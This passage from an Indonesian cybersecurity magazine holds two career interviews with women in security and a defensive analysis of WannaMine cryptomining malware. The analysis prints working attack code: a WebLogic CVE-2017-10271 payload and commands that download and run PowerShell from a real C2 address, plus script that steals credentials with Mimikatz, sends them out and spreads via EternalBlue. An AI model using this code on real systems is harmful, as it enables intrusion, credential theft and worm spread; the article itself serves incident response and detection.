practice yang disarankan. Buat yang se- memfasilitasi dan mengumpulkan orang-
nang mengembangkan konsep keamanan, orang dengan minat yang sama dalam
kesempatan untuk riset mengenai konsep satu wadah, biar exploring nya bisa lebih
keamanan terbaru sesuai dengan perkem- semangat lagi.
bangan teknologi terbuka lebar. Untuk
Q : Bagaimana pandangan mba Icha,
yang hobi membobol atau menguji sistem,
mengapa di dunia keamanan siber ma-
explore lah lebih jauh, jangan lupa etika
sih sangat sedikit pegiat keamanan si-
nya tetap dijaga. Bagi yang suka bagian
manajemen keamanan siber, pelajarilah ber wanita ? Adakah yang salah dengan
best practice yang digunakan di dunia ten- dunia IT Security itu sendiri ?
tang cara pengelolaan keamanan dunia si-
A : Saya pribadi melihat mungkin lebih ke
ber. Orang-orang yang sudah terjun ke
arah stereotype ya. Jujur nih ya, dulu sem-
dunia keamanan siber ini punya speciality
pet “ditakut-takutin” kalo jurusan ini sulit,
nya masing-masing dan jalan setiap orang
susah lulus lah, ini lah, itu lah. Pluuus, saya
berbeda-beda, jadi saya rasa tidak ada pa-
sebagai orang baru liat ini kok isinya co-
tokan jelasnya untuk skill pertama yang ha-
wok semuaaaa, jadi sempet jiper duluan.
rus dimiliki adalah ini atau itu. Mulailah dari
Tapi gimana ya, kalau sudah suka mah, ya
apapun yang dirasa perlu, you’ll find your
udah suka aja, mau badai rintangan
own way later on.
menghadang ya jalanin aja, ehehe,

Akhirnya nekadlah saya belajar dunia siber keahlian dan kemauan untuk terus improve
ini, eh, ketagihan, ya mau bagaimana lagi. jauh lebih penting dalam dunia siber ini.
Q : Menurut anda, bagaimana peluang Yang sangat disayangkan adalah jika talent
karir wanita di IT Security? itu ada, namun terkubur dengan ketakutan
akan stereotype yang bahkan kebenaran-
A : Waaah, sebenarnya terbuka sekali. De- nya pun masih dipertanyakan. Ada ban-
mand sedang banyak karena awareness yak teman-teman yang saya kenal beralih
dari public mulai terbentuk (hal ini salah sa- pada bidang lain hanya karena merasa ti-
tunya disebabkan oleh semakin banyaknya dak mampu untuk bersaing, bahkan disaat
bentuk-bentuk serangan siber yang ber- belum mencoba. Hal ini sangatlah
dampak langsung kepada masyarakat disayangkan, karena bisa jadi potensi
luas), apalagi regulator mulai menggalak- mereka suatu saat bisa membuat dunia IT
kan aspek keamanan teknologi. Security ini lebih maju lagi.
Cuma tantangannya ya itu, melawan Q : Menurut anda, apa yang harus dila-
stereotype yang sudah terbentuk. Tapi, di- kukan pemerintah dalam hal ini BSSN
mana ada kemauan disitu ada jalan kan
untuk membuat wanita di Indonesia ter-
ya, saya percaya sekali dengan ini. Selama
tarik untuk bekerja di bidang keamanan
ini yang bisa membuat semangat dan
siber (cybersecurity)?
happy, peluang karir di dunia IT Security ini
menurut saya selalu terbuka lebar. A : Untuk perlahan menghilangkan stereo-
type, mungkin pembentukan platform
Q : Setelah menggeluti dunia IT Security
khusus wanita bisa dilakukan. Diadakan-
sekian lama, menurut pendapat mba
nya meetup-meetup khusus wanita yang
Icha, hal apa sih menurut mba Icha bergelut di dunia keamanan siber, riset ber-
yang dapat menguatkan bahwa dunia IT sama dan acara-acara lain yang berkaitan
Security tetap memerlukan sentuhan dapat diselenggarakan. Hal ini bermaksud
wanita ? sebagai bentuk penguatan mental juga, un-
tuk menunjukkan, “Ini loooh, bidang ini
A : Wah, saya masih anak baru di dunia si-
ada ceweknya juga, kamu gak sendirian”.
ber ini, masih perlu banyak sekali belajar.
Biar gak jiper duluan kalo pas meetup
Saya percaya tiap individu memiliki talent
yang dateng laki-laki semua, hhe,
masing-masing. Terlepas dari gender,

Q : Ada ngga sih mba tokoh wanita di
dunia IT Security yang mba Icha ido-
lakan ? Kalo ada kenapa sih mba Icha
mengidolakannya ?
A : Google’s security princess, Parisa Tab-

riz. Inspiring banget, perempuan, masih
muda, pinter, IT Security, berprestasi, Goo-
gle (I mean, come on, hhi).
Q : Terakhir, Quotes mba Icha terkait

dengan dunia keamanan siber ?
A : It is hard work and skill that matter, not

gender. Stay secure, stay gorgeous.
Annisa Fitriana Suryana 

MSc Cyber Security in South-
ampton University
Passion di bidang privacy in Bitcoin, PCI

DSS Project dan Information Security
77
Lebih Dekat dengan Elisabeth ‘Ibeth’ Damayanti
- Srikandi Siber Indonesia
“Hal yang paling menarik

(saat bekerja di bidang kea-
manan siber) adalah pada saat
anda harus membangun kesada-
ran keamanan dan meyakinkan
setiap orang mengenai pent-
ingnya keamanan siber”
-Ibeth Damayanti
Foto : Ibeth Damayanti [Koleksi : Redaksi]
Pada kesempatan ini kita berkesempatan Q: Bisa tolong jelaskan peran ibu di PT
untuk mewawancarai salah satu wanita Telkom Indonesia ?
yang berkecimpung di dunia keamanan si-
A: Saat ini saat ini saya menjabat sebagai
ber Indonesia. Dia adalah Ibu Ibeth Damay-
Operational Senior Manager pada Cyber
anti, saat ini beliau adalah Operational Sen-
Security Operation Center. Tanggung ja-
ior Manager Cyber Security di PT Telkom
wab utama saya adalah memastikan opera-
Group. Untuk mengenal lebih dekat menge-
sional dan pengelolaan dari jaringan dan
nai beliau dan bagaimana beliau bisa ter-
keamanan IT di Telkom Group.
jun menekuni dunia keamanan siber, mari
kita simak wawancara dengan beliau.

Q : Apakah sebenarnya anda benar- Q: Apa pekerjaan anda pertama kali se-
benar menginginkan berkeja di industri telah anda lulus ?
keamanan siber ? A : Saya seorang engineer yang bertugas
A : Pertama kali, sebenarnya ini adalah se- untuk melakukan reset terhadap modem
buah kecelakaan, na- X.25 setiap paginya, kemu-
mun kemudian pada dian merakit PC bahkan
“Pada awalnya bekerja di harus melakukan ‘crimp-
akhirnya saya men-
bidang keamanan siber, bagi ing’ kabel LAN.
jadi sangat tertarik di
saya adalah sebuah ‘kece-
bidang ini dan saat Q: Lalu bagaimana
ini menjadi passion
lakaan’ tapi saat ini, keamanan
siber telah menjadi passion anda bisa akhirnya ter-
saya.
bagi saya” jun menekuni dunia kea-
Q: Apa dahulu cita- manan siber?
cita Ibu sebenarnya - ‘Ibeth’ Damayanti A : Seperti yang saya ka-
? takan sebelumnya..ini
A: Dahulu saya sangat tertarik menonton adalah sebuah kecelakaan
film yang menceritakan mengenai bagai-
Q: Apa hal yang paling anda sukai
mana memecahkan kasus di pengadilan,
ketika bekerja di bidang keamanan si-
yang membuat saya ingin bercita-cita men-
ber ?
jadi jaksa..memecahkan kasus dan nam-
paknya ini sangat keren bagi saya A : Hal yang paling menarik adalah pada
saat anda harus membangun kesadaran
Q: Siapa tokoh yang menjadi figur bagi
keamanan dan meyakinkan setiap orang
anda saat anda beranjak tumbuh ?
mengenai pentingnya keamanan siber dan
A : Ayah saya, dia adalah seorang perwira hal ini merupakan akar yang harus diban-
polisi. Dia mengajarkan kepada saya men- gun pertama kali dalam keamanan siber.
genai integritas, kebenaran dan menolong
Kemudian ketika kita harus menerima ken-
orang lain dan tentunya mematuhi aturan
yataan dari orang-orang “so what?”, kemu-
hukum.
dian bagaimana kita harus menjamin pri-
Q: Kalo boleh tahu dahulu saat kuliah ju- vasi ataupun informasi atau bahkan raha-
rusan apa yang Ibu ambil ? sia korporasi dari publik.
A : Jurusan Teknik Informatika

Seperti halnya, kesehatan kita, jika kita ti- Q: Apa saran anda bagi para pemula
dak memiliki kesadaran keamanan yang ha- dan pelajar yang ingin memulai karir di
rus selalu kita pelihara, maka tentu hidup bidang keamanan siber?
kita tidak akan sehat.
A: Seperti yang saya katakan, keamanan
Q: Apakah anda memiliki mentor? siber berkembang sangat cepat. Jadi hal
Apakah memiliki mentor merupakan hal ini perlu diimbangi dengan keinginan dan
yang penting dalam karir dan kehidupan kemampuan untuk belajar secara terus
pribadi anda? menerus. Lebih jauh
“Ubah mindset anda untuk lagi, keamanan siber
A: Tentu saja. Beliau
menjadi lebih ingin tahu dan sangat diperlukan
adalah atasan saya
lebih peka” diberbagai bidang de-
pada pekerjaan yang
wasa ini, jadi belajar
s e b e l u m n y a . S e j u-
- ‘Ibeth’ Damayanti keamanan siber saja
jurnya saya tidak per-
sangatlah tidak men-
nah benar-benar diba-
cukupi, kita juga perlu untuk belajar hal
wah perintahnya secara langsung, tapi
lain yang terkait dengannya. Jaringan mem-
saya sering berdiskusi dan belajar banyak
butuhkan keamanan, aplikasi membutuh-
dari beliau. Seperti kata orang-orang, cari-
kan keamanan, sistem operasi juga mem-
lah mentor dari seseorang yang sudah 2
butuhkan keamanan, jika kita tidak men-
level diatas kita. Saat itu beliau sudah 3
gerti dan paham bidang-bidang tersebut
level diatas saya
bagaimana kita dapat mengimplementasi-
Beliau mengajarkan saya bagaimana cara-
kan keamanan yang tepat pada bidang ter-
nya menghadapi masalah, bagaimana in-
sebut?
teraksi dengan orang lain, dan bagaimana
membangun relasi. Akhirnya hal-hal terse- Q: Apa saran anda bagi mereka yang
but terbukti sangat berguna tidak hanya un- ingin pindah jalur karir ke bidang kea-
tuk kehidupan professional saya tapi juga manan siber?
kehidupan pribadi saya. A : Ubah mindset untuk menjadi lebih ingin
tahu dan lebih peka. Orang-orang di luar
sana memiliki pemikiran yang diluar kebi-
asaan, jadi kita juga perlu berpikir diluar
hal-hal yang biasa. Jika sebelumnya kita

merasa aman dan cukup hanya dengan IBETH DAMAYANTI
username dan password maka jangan Operational Senior Manager
harap hal tersebut masih berlaku di bidang pada Cyber Security Operation
keamanan siber saat ini. Tidak pernah ada Center, PT Telkom Group
yang cukup di bidang keamanan siber.
Q: Apa tips dan trik anda untuk mem-

buat bidang keamanan siber menjadi
bidang yang lebih beragam (dari sisi
gender) dan inklusif
A: Saya rasa untuk membuat bidang peker-

jaan ini lebih beragam adalah dengan mem-
berikan kesempatan lebih besar untuk
merekrut para wanita kedalam pekerjaan
ini. Wanita memiliki sesuatu yang dibutuh-
kan pada keamanan siber. Mereka sangat
teliti dalam melakukan pekerjaannya.
Mereka ingin segala hal bekerja dan berja-
lan sesuai rencana dan arahan. Mereka
juga memiliki persiapan dan organisasi
yang baik. Karakter-karakter seperti ini
yang diharapkan dapat membantu mereka
dalam bekerja lebih efisien dan lebih baik.
Ketika gagal, wanita cenderung memiliki
manajemen resiko yang lebih baik. Bahkan
dalam hal yang gawat dan darurat, mereka
terkadang memiliki ide-ide cemerlang yang
bisa diaplikasikan. Terakhir, wanita
memiliki lebih banyak empati untuk mema-
hami rekan kerjanya, jadi rekan kerja akan
merasa lebih diperhatikan dan membawah
energi positif antar rekan kerja.
81
4 “Knowing is not enough,
we must apply it. Willing
is not enough, we must
HOT TOPICS do it”
– Johann Wolfgang van Goethe
WannaMine, Malware Canggih Pembajak CPU
ditulis oleh Christofer Simbar
Sumber : https://www.techworm.net/wp-content/uploads/2018/02/cryptocurrency-mining-malware.png
Bagi anda yang berkecimpung di dunia TI, kerentanan pada SMB v1 pada sistem op-
atau memiliki ketertarikan dengan erasi Microsoft Windows.
teknologi, tentu masih ingat dengan seran-
gan malware WannaCry yang sempat mem- Sudah beberapa bulan berlalu sejak insi-
buat heboh hampir seluruh negara di dunia den tersebut, namun ternyata masih
pada bulan Mei 2017. Tidak terkecuali banyak organisasi dan perusahaan yang
Indonesia, dimana beberapa Rumah Sakit belum mengimplementasikan langkah miti-
dan sekolah juga ikut terkena dampaknya. gasi yang disarankan Microsoft Security
Dalam penyebarannya, malware ini meng- Bulletin MS17-010, misalnya dengan mela-
kukan patch atau menonaktifkan SMB v1.
gunakan exploit EternalBlue yang dirilis
Kondisi ini kemudian dimanfaatkan oleh
pertama kali ke publik oleh The Shadow
para pembuat malware untuk membuat
Broker. Exploit ini sendiri memanfaatkan

variasi malware lain yang menggunakan Dalam tulisan ini saya tidak akan menjelas-
teknik yang sama dalam melakukan penye- kan tentang bitcoin mining dan bagaimana
baran. Tujuannya masih sama yaitu menda- proses ini bisa menghasilkan keuntungan.
patkan uang, namun dengan cara yang Ada cukup banyak referensi di Internet
lebih lunak jika dibandingkan dengan yang menjelaskan tentang hal ini. Salah sa-
ransomware. Beberapa praktisi keamanan tunya yang saya rasa paling menarik dan
menamakan malware ini WannaMine. mudah dimengerti adalah video ini
https://www.youtube.com/watch?v=o1ug
Apa itu WannaMine ? NnMyeZc
Istilah ini muncul

karena 2 hal yang
menjadi karakteristik
malware ini, yaitu per-
tama, malware ini
menggunakan teknik
penyebaran yang
sama yang dipakai
oleh WannaCry, dan
kedua, malware ini
menggunakan sumber
daya komputer yang
diserang untuk mela-
kukan proses bitcoin
mining. Jadi malware
Gambar 1 Tampilan pada komputer yang terkena WannaCry
ini mendapatkan keuntungan dari hasil
mining yang dilakukan menggunakan kom-
Salah satu indikasi komputer terkena
puter korbannya, bukan dari hasil
WannaMine yaitu utilisasi CPU yang men-
pemerasan. Aktivitas inilah yang menye-
capai 100%. Jika hal ini menimpa sebuah
babkan malware ini disebut juga dengan
Web Server maka server tersebut tidak
istilah Cryptomining Malware atau Crypto-
akan bisa melayani permintaan lainnya, se-
jacking.

luruh sumber dayanya habis dibajak oleh Karakteristik WannaMine secara umum
WannaMine. adalah sebagai berikut:
Varian WannaMine yang saya temukan ter- 1. Menggunakan WMI untuk melakukan
masuk canggih, karena sebagian besar persistensi
payload utamanya tidak menggunakan file.
2. Mencuri kredensial menggunakan
Payload yang berisi instruksi berupa skrip
Mimikatz, dan mengirimkannya ke C2
powershell dan beberapa binary disimpan
(Command and Control) server
pada WMI (Windows Management Instru-
mentation) Class. Payload ini kemudian di-
3. Mengidentifikasi target berikutnya
load langsung ke memori menggunakan
dengan mengidentifkasi subnet kom-
teknik yang disebut dengan Reflective DLL
puter, menggunakan perintah NET-
Injection.
STAT untuk berpindah ke
subnet lain, dan menghasil-
kan IP address secara acak
untuk berpindah ke target
lain melalui Internet.
4. Lateral movement, me-

manfaatkan kerentanan
SMBv1 atau menggunakan
kredensial yang sudah di-
curi.
5.Membuat sebuah task

scheduler baru untuk men-
jalankan payload tambahan
Gambar 2 Cryptomining malware menggunakan seluruh sumber daya
CPU untuk bitcoin mining
6. Menggunakan powershell.exe dan

cmd.exe untuk mengeksekusi se-
bagian besar payload

7. Memiliki kemampuan untuk melakukan compile source code menggunakan csc.exe
(C# Compiler). File exe ini biasanya tersedia di seluruh sistem yang sudah terinstall
Microsoft .NET Framework.
Berdasarkan sejumlah referensi di Internet, malware ini menggunakan nama WMI Class
yang berbeda-beda. Hal ini berarti sudah tersedia malware kit yang bisa memudahkan
penggunanya membuat varian baru.
Infeksi awal
Dari berbagai sumber di Internet, ada 2 macam cara yang berhubungan dengan infeksi
awal malware ini, yang pertama melalui email phishing dan yang kedua dengan meman-
faatkan kerentanan pada komputer korban. Mekanisme dengan email phishing dilakukan
dengan menyisipkan skrip command line pada konten email.
POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: SOMEHOSTHERE
Content-Length: 1226
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.19.0-25-generic
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">

Jenis kerentanan yang disebut-sebut memiliki keterkaitan dengan WannaMine adalah
CVE-2017-10271 yaitu suatu kerentanan validasi input pada WebLogic Server Security
Service (WLS Security) dalam Oracle WebLogic Server versi 12.2.1.2.0 ke bawah.
<array class="java.lang.String" length="3">

<void index = "0">
<string>cmd</string>
</void>
<void index = "1">
<string>/c</string>
</void>
<void index = "2">
<string>powershell -exec bypass IEX (New-Object
Net.WebClient).DownloadString(
'http://[alamat_c2_server]:8000/info6.ps1')</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Persistensi dengan WMI
Windows Management Instrumentation (WMI) normalnya digunakan oleh administrator

atau aplikasi untuk manajemen server secara remote. Misalnya untuk melihat daftar
proses yang berjalan, daftar software yang terinstall, mengakses registry, dan lain-lain. Tek-
nik persistensi dengan memanfaatkan WMI ini sebenarnya bukan teknik baru. Dalam kon-
ferensi Black Hat 2015, Matt Graeber mempublikasikan hasil risetnya yang berjudul “Abus-
ing Windows Management Instrumentation (WMI) to Build a Persistent, Asyncronous, and
Fileless Backdoor”.
Pada komputer yang terkena WannaMine, akan terbentuk sebuah WMI Class palsu yang
diberi nama sesuai selera si penyerang. Ada yang menggunakan nama TaskServices,

Win32_Services, dan lain-lain. Nama yang digunakan menyerupai nama yang digunakan
oleh Microsoft. Gambar di bawah ini menunjukkan bagaimana sebuah WMI Class digu-
nakan untuk menyembunyikan payload. Tool yang bisa kita digunakan untuk mengakses
WMI Class adalah wbemtest.exe. Tool ini terinstall secara default di semua versi Win-
dows. Seperti varian WannaMine lainnya, sample malware yang saya temukan juga meng-
gunakan namespace root\default.
Gambar 3 Tampilan WMI Class palsu yang dibuat oleh malware dengan
bantuan tool WBEMTEST.exe
 
Anda mungkin bertanya, apa fungsi dari properties dalam class tersebut. Berikut penje-
lasannya:
Property Name Keterangan
mon Binary Monero CPU miner

mimi Binary Mimikatz, digunakan untuk mencuri kredensial
Kombinasi berbagai skrip untuk melakukan remote DLL Loading menggunakan WMI
funs
dan EternalBlue yang sudah di-obfuscate untuk mempersulit deteksi

Property Name Keterangan
i17 Daftar IP Address yang memiliki kerentanan SMBv1 (MS17-010)
ipsu Daftar IP Address yang bisa diakses menggunakan kredensial yang dicuri
sc Binary Shellcode yang digunakan untuk mendownload payload dari C2 Server
vcp Binary untuk msvcp120.dll, runtime library untuk Microsoft Visual C++
vcr Binary untuk msvcr120.dll, runtime library untuk Microsoft Visual C++
Cara mengidentifikasi WMI Class ini cukup

mudah, apalagi jika kita menggunakan
teknologi Endpoint Detection and Re-
sponse (EDR) yang memiliki kemampuan
merekam berbagai event pada endpoint un-
tuk kebutuhan investigasi dan analisis
Gambar 5 EDR menampilkan command line yang
malware.
dieksekusi dengan powershell
Gambar 4 EDR mendeteksi aktivitas berbahaya dari proses powershell

Nama class bisa diidentifikasi dengan mudah dari command line yang digunakan. Apabila
anda tidak memiliki EDR, maka cara lainnya adalah melakukan investigasi secara manual
pada endpoint menggunakan Task Manager. Tampilkan kolom “Command Line”, kemu-
dian cari proses powershell yang mencurigakan.
Gambar 6 Investigasi command line menggunakan Task Manager

Investigasi WMI dengan WMIC
Dalam sebuah whitepaper yang berjudul “Windows Management Instrumentation (WMI) Of-
fense, Defense and Forensic”, Fireeye menjelaskan dengan sangat rinci tentang bagaimana
WMI digunakan untuk persistensi serangan, dan sekaligus juga menjelaskan bagaimana
cara mendeteksinya. Ada 3 class yang diperlukan untuk mencapai persistensi dengan
WMI:
• __EventFilter, yaitu jenis event yang akan digunakan sebagai pemicu (trigger)
• __EventConsumer, yaitu instruksi atau perintah yang akan dieksekusi pada saat event
aktif. Isi perintah disimpan dalam property bernama CommandLineTemplate.
• __FilterToConsumerBinding, yaitu suatu mekanisme registrasi yang akan menghubung-

kan __EventFilter dan __EventConsumer.

Berikut ini adalah beberapa skrip WMIC (Windows Management Instrumentation
Command-line) yang dapat kita gunakan untuk memeriksa WMI:
wmic/namespace:\\root\subscription PATH __EventConsumer get/format:list
wmic/namespace:\\root\subscription PATH __EventFilter get/format:list
wmic/namespace:\\root\subscription PATH __FilterToConsumerBinding get/format:list
wmic/namespace:\\root\subscription PATH __TimerInstruction get/format:list
Dibawah ini beberapa contoh tampilan setelah menjalankan command di atas:
Gambar 7 Payload yang tersimpan di __EventConsumer
Untuk menganalisis payload dengan lebih mudah, kita bisa menyimpan output langsung
ke file dengan perintah berikut ini:
wmic/namespace:\\root\subscription PATH __EventConsumer get/format:list >

payload.txt
Untuk men-decode Base64 payload ke bentuk aslinya, bisa menggunakan layanan online
misalnya https://www.base64decode.org/.

Gambar 8 Payload yang tersimpan pada __EventFilter
 
Gambar di atas menunjukkan bahwa malware menggunakan class Win32_PerfFormatted-
Data_PerfOS_System yang biasanya digunakan untuk system monitoring. Event untuk
class ini akan dieksekusi secara realtime, karena itulah pembuat malware menggunakan
class ini untuk memastikan CommandLineTemplate dieksekusi sesuai jadwal, dalam hal
ini 5600 detik atau sekitar 90 menit.
Gambar 9 Payload yang tersimpan pada __FilterToConsumerBinding

Membedah lebih dalam payload utama WannaMine
Pada saat eksekusi awal WannaMine akan mendownload payload bernama info6.ps1 un-
tuk sistem operasi 64 bit, atau info3.ps1 untuk sistem operasi 32 bit. Pada tulisan ini saya
mengambil sample info6.ps1.
cmd /c powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject

Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object
Net.WebClient).DownloadString('http://195.22.127.157:8000/info6.ps1')}else{IEX(New
-Object Net.WebClient).DownloadString('http://195.22.127.157:8000/info3.ps1')}"
File info6.ps1 terdiri atas 2 bagian besar, bagian yang pertama berisi sebuah variable $fa
dengan nilai berupa Base64 string. Variabel ini menyimpan seluruh payload yang akan di-
masukkan ke dalam WMI class. Bagian kedua di-obfuscate menggunakan tool yang dikem-
bangkan oleh Daniel Bohannon (https://github.com/danielbohannon/Invoke-Obfuscation ).
Gambar 10 Payload di-obfuscate untuk mempersulit analisis

Payload ini kemudian dieksekusi dan akan membentuk sejumlah WMI class palsu seperti
yang telah dijelaskan di atas. Instruksi disimpan dalam CommandLineTemplate yang
akan dieksekusi setiap kali kondisi yang sudah didefinisikan dalam __EventFilter terpenuhi.
Malware ini menggunakan sejumlah skrip open source yang dipublikasikan di Github. Be-
berapa skrip yang berhasil diidentifikasi yaitu (urutan sesuai isi property “funs” pada WMI
class Win32_Services):
https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1
https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
https://github.com/EmpireProject/Empire/blob/master/data/module_source/exploitation/Exploit-Eterna
lBlue.ps1
https://github.com/vletoux/ms17-010-Scanner
Berikut ini adalah beberapa bagian skrip yang dieksekusi melalui CommandLineTem-
plate:
Load Library dan Kernel
$funs = ([WmiClass] 'root\default:Win32_Services').Properties['funs'].Value

$defun = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun
Skrip di atas akan mengambil isi property “funs” pada WMI Class Win32_Services dan
menggunakannya sebagai referensi untuk eksekusi skrip selanjutnya.
Mematikan proses powershell lain yang dibuat oleh malware lain
foreach ($t in $tcpconn)

{
$line = $t.split(' ')| ? {$_}
if (!($line -is [array])) {continue}
if (($line[-3].contains(":3333") -or $line[-3].contains(":5555") -or
$line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
{
$evid = $line[-1]
Get-Process -id $evid | stop-process -force
}
}

Hal ini cukup menarik, malware ini akan mematikan proses yang dibuat oleh varian lainnya
untuk memastikan si pemilik malware mendapatkan keuntungan yang maksimal.
if (!$exist -and ($psids.count -le 8))

{
$cmdmon = "powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass]
'root\default:Win32_Services').Properties['mon'].Value;`$funs = ([WmiClass]
'root\default:Win32_Services').Properties['funs'].Value ;iex
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-C
ommand -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
$vbs = New-Object -ComObject WScript.Shell

$vbs.run($cmdmon, 0)
}
Monero dieksekusi menggunakan teknik Reflective PE Injection dengan powershell,

sehingga tidak meninggalkan bekas apapun pada disk. Library untuk teknik tersebut juga
tersimpan dalam property “funs”.
Membaca kredensial menggunakan Mimikatz dan mengirimkannya ke C2 server
$NTLM = $False
#load mimikatz dan baca username+password

$mimi = ([WmiClass] 'root\default:Win32_Services').Properties['mimi'].Value
$a, $NTLM = Get-creds $mimi $mimi
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
#load IP address untuk target berikutnya

$ipsu = ([WmiClass] 'root\default:Win32_Services').Properties['ipsu'].Value
#load IP address yang memiliki kerentanan SMBv1

$i17 = ([WmiClass] 'root\default:Win32_Services').Properties['i17'].Value
#load shellcode
$scba = ([WmiClass] 'root\default:Win32_Services').Properties['sc'].Value
[byte[]]$sc = [System.Convert]::FromBase64String($scba)
se = @('195.22.127.157', '93.174.93.73')
$nic = '195.22.127.157'
foreach ($t in $se)

{
$pin = test-connection $t
if ($pin -ne $null)
{
$nic = $t
break
}
}

$nic = $nic + ":8000"
if ($a.count -ne 0)
{
foreach ($aa in $a) {
$data = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aa))
(New-Object Net.WebClient).DownloadString("http://$nic/api.php?data=" + $data)
}
}
Menyimpan daftar IP target berikutnya untuk Lateral Movement
foreach ($Network in $Networks)

{
$IPAddress = $Network.IpAddress[0]
if ($IPAddress -match '^169.254')
{
continue
}
#simpan IP dalam subnet yang sama

$SubnetMask = $Network.IPSubnet[0]
$ips = Get-NetworkRange $IPAddress $SubnetMask
#simpan IP yang terkoneksi dengan komputer ini

$tcpconn = netstat -anop tcp
foreach ($t in $tcpconn)
{
$line = $t.split(' ')| ? {$_}
if (!($line -is [array])) {
continue
}
if ($line.count -le 4) {
continue
}
$i = $line[-3].split(':')[0]
if (($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains
$i))
{
$ips += $i
}
}
! #Lakukan scanning untuk memeriksa IP address yang vulnerable

if (([Environment]::TickCount - $stime) / 1000 -gt 5400) {break}
foreach ($ip in $ips)
{
if (([Environment]::TickCount - $stime) / 1000 -gt 5400) {break}
if ($ip -eq $IPAddress) {continue}

if ((Test-Connection $ip -count 1) -ne $null -and $ipsu -notcontains $ip)
{
$re = 0
if ($a.count -ne 0)
{
#tes koneksi ke IP menggunakan kredensial yang diperoleh sebelumnya
$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM
}
if ($re -eq 1)
{
$ipsu = $ipsu + " " + $ip
}
else
{
#jika vulnerable MS17-010,lakukan inject shellcode dengan EternalBlue
$vul = [PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17 -notcontains $ip)
{
$res = eb7 $ip $sc
if ($res -ne $true)
{
eb8 $ip $sc
}
$i17 = $i17 + " " + $ip
}
}
}
}
}
#simpan seluruh IP vulnerable ke WMI class

$StaticClass = New-Object Management.ManagementClass('root\default:Win32_Services')
$StaticClass.SetPropertyValue('ipsu' , $ipsu)
$StaticClass.Put()
$StaticClass.SetPropertyValue('i17' , $i17)
$StaticClass.Put()
Kredensial dikirim dalam format Base64 dengan susunan <nama><domain><password>.
Pada bagian ini malware melakukan scanning ke seluruh IP address dalam subnet yang
sama, dan juga menggunakan perintah NETSTAT untuk mencari IP di subnet lain yang
terkoneksi.
Mencoba mencari target server lain di Internet
$t = test-connection 9.9.9.9 -Verbose -Count 2

if ($t) {
[System.Threading.Mutex]$thread_mutex;
[bool]$result = $false;
$thread_mutex = New-Object System.Threading.Mutex($true, "MMLOLSacnner", [ref] $result);

if (!$result) {
exit;
}
while ($true) {
$ip = [IPAddress]::Parse([String] (Get-Random)).IPAddressToString
$vul = [PingCastle.Scanners.m17sc]::Scan($ip)
#jika vulnerable lakukan injeksi dengan EternalBlue
if ($vul)
{
$res = eb7 $ip $sc
if ($res -ne $true)
{
eb8 $ip $sc
}
}
Start-Sleep 5
}
}
 
Pada bagian akhir, malware mencoba mencari target lainnya di Internet yang memiliki
kerentanan SMBv1.
Penanganan insiden WannaMine
Berikut ini adalah contoh skrip powershell yang bisa digunakan untuk membersihkan
WannaMine:
foreach($ip in Get-Content .\daftarserver.txt) {

Write-Output "==================================="
Write-Output "Processing $ip ..."
Write-Output "==================================="
$wmi = gwmi win32_bios -ComputerName $ip -ErrorAction SilentlyContinue
if ($wmi)
{
Write-Host "Connection on computer $ip successful." -ForegroundColor DarkGreen;
#these lines are used to kill malicious process which can be identified by their command
line or path
! wmic /node:$ip process WHERE "COMMANDLINE LIKE '%%default:Win32_Services%'" CALL TERMI-
NATE
wmic /node:$ip process WHERE "COMMANDLINE LIKE '%%info6.ps1%'" CALL TERMINATE
! wmic /node:$ip process WHERE
"ExecutablePath='C:\\ProgramData\\UpdateService\\UpdateService.exe'" CALL TERMINATE!

wmic /node:$ip process WHERE "ExecutablePath='C:\\ProgramData\\AppCache\\17_\\java.exe'" CALL
TERMINATE
wmic /node:$ip process WHERE "ExecutablePath='C:\\ProgramData\\AppCache\\17\\java.exe'"
CALL TERMINATE
wmic /node:$ip process WHERE "ExecutablePath='C:\\ProgramData\\AppCache\\16\\java.exe'"
CALL TERMINATE
wmic /node:$ip process WHERE "COMMANDLINE LIKE
'%JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAG%'" CALL TERMINATE
#delete all malicious files

WMIC /node:$ip path cim_datafile WHERE
"path='C:\\ProgramData\\UpdateService\\UpdateService.exe'" delete
WMIC /node:$ip path cim_datafile WHERE "path='C:\\ProgramData\\AppCache\\17_\\java.exe'"
delete
WMIC /node:$ip path cim_datafile WHERE "path='C:\\ProgramData\\AppCache\\17\\java.exe'"
delete
WMIC /node:$ip path cim_datafile WHERE "path='C:\\ProgramData\\AppCache\\16\\java.exe'"
delete
#change "Win32_Services" and "DSM Event" to match evil class and instance name found in your
environment
wmic /node:$ip /NAMESPACE:"\\root\default" PATH Win32_Services DELETE
wmic /node:$ip /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE "Name LIKE 'DSM
Event%'" DELETE
wmic /node:$ip /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE
"Name LIKE 'DSM Event%'" DELETE
